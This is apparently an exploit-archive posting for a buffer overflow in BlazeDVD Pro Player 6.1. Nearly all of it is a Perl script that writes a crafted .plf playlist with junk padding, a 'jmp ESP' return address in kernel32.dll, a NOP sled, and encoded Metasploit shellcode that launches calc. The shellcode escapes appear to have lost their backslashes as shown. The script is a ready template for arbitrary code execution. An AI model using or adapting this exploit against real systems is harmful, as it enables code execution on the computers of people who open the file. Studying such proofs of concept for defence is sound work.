Home / exploits BlazeDVD Pro Player 6.1 Buffer Overflow
Posted on 09 April 2014
## EDB Note, XPSP3 - my $eip = pack('V',0x7c868667); #jmp ESP on kernel32.dll # Date: Tue Apr 8 2014 # Vendor link: http://www.blazevideo.com/download.htmm # Software Link: http://www.blazevideo.com/download.php?product=BlazeDVDPro # App Version: 6.1 # Tested on: Windows XP service pack 2 (en) my $file= "blazeExpl.plf"; my $junk= "A" x 260; my $eip = pack('V',0x7C82385D); #jmp ESP on kernel32.dll my $prependesp = "XXXX"; #add 4 bytes so ESP points at beginning of shellcode bytes my $shellcode = "x90" x 25; #start shellcode with some NOPS # windows/exec - 303 bytes # http://www.metasploit.com # Encoder: x86/alpha_upper # EXITFUNC=seh, CMD=calc $shellcode = $shellcode . "x89xe2xdaxc1xd9x72xf4x58x50x59x49x49x49x49" . "x43x43x43x43x43x43x51x5ax56x54x58x33x30x56" . "x58x34x41x50x30x41x33x48x48x30x41x30x30x41" . "x42x41x41x42x54x41x41x51x32x41x42x32x42x42" . "x30x42x42x58x50x38x41x43x4ax4ax49x4bx4cx4a" . "x48x50x44x43x30x43x30x45x50x4cx4bx47x35x47" . "x4cx4cx4bx43x4cx43x35x43x48x45x51x4ax4fx4c" . "x4bx50x4fx42x38x4cx4bx51x4fx47x50x43x31x4a" . "x4bx51x59x4cx4bx46x54x4cx4bx43x31x4ax4ex50" . "x31x49x50x4cx59x4ex4cx4cx44x49x50x43x44x43" . "x37x49x51x49x5ax44x4dx43x31x49x52x4ax4bx4a" . "x54x47x4bx51x44x46x44x43x34x42x55x4bx55x4c" . "x4bx51x4fx51x34x45x51x4ax4bx42x46x4cx4bx44" . "x4cx50x4bx4cx4bx51x4fx45x4cx45x51x4ax4bx4c" . "x4bx45x4cx4cx4bx45x51x4ax4bx4dx59x51x4cx47" . "x54x43x34x48x43x51x4fx46x51x4bx46x43x50x50" . "x56x45x34x4cx4bx47x36x50x30x4cx4bx51x50x44" . "x4cx4cx4bx44x30x45x4cx4ex4dx4cx4bx45x38x43" . "x38x4bx39x4ax58x4cx43x49x50x42x4ax50x50x42" . "x48x4cx30x4dx5ax43x34x51x4fx45x38x4ax38x4b" . "x4ex4dx5ax44x4ex46x37x4bx4fx4dx37x42x43x45" . "x31x42x4cx42x43x45x50x41x41"; open($FILE,">$file"); print $FILE $junk.$eip.$prependesp.$shellcode; close($FILE); print "plf File Created successfully ";
